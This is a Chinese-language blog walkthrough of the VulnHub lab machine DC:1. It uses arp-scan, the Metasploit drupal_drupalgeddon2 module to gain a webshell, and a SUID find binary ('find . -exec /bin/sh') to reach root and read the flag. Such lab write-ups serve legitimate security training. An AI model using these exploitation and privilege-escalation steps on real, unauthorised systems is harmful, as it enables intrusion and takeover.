vulnhub靶场之DC:1

Ethan医生2个月前靶场88

准备:

攻击机:虚拟机kali、本机win11

靶机:DC:1,下载地址:

https://www.vulnhub.com/entry/dc-1,292/


一:信息收集


arp-scan查看有哪些刚起的IP


image.png


访问192.168.233.141请求后发现有个CMS网站

image.png



二:WEB服务

直接使用MSF进行查找payload


msfconsole -> search 需要找的payload


image.png


直接use  exploit/unix/webapp/drupal_drupalgeddon2 设置好RHOST和RPORT直接run 获取到webshell

image.png


三:提权


命令:SUID GUID

使用命令查找SUID权限的挡案

find / -perm -u=s -type f 2>/dev/null

image.png

发现到find也给予的SUID权限,这里可以利用进行提权

可以使用下面网址查看命令提权

https://gtfobins.github.io/#find


image.png



使用命令执行

find . -exec /bin/sh \;

image.png


直接查看root底下有哪些好东西

cat thefinalflag.txt

image.png


标签: vulnhub靶场

相关文章

vulnhub靶场之HACKSUDO: 2 (HACKDUDO)

vulnhub靶场之HACKSUDO: 2 (HACKDUDO)

vulnhub靶场之HACKSUDO: 2 (HACKDUDO)准备:攻击机:虚拟机kali、本机win10。靶机:hacksudo: 2 (HackDudo),下载地址:https://downlo...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。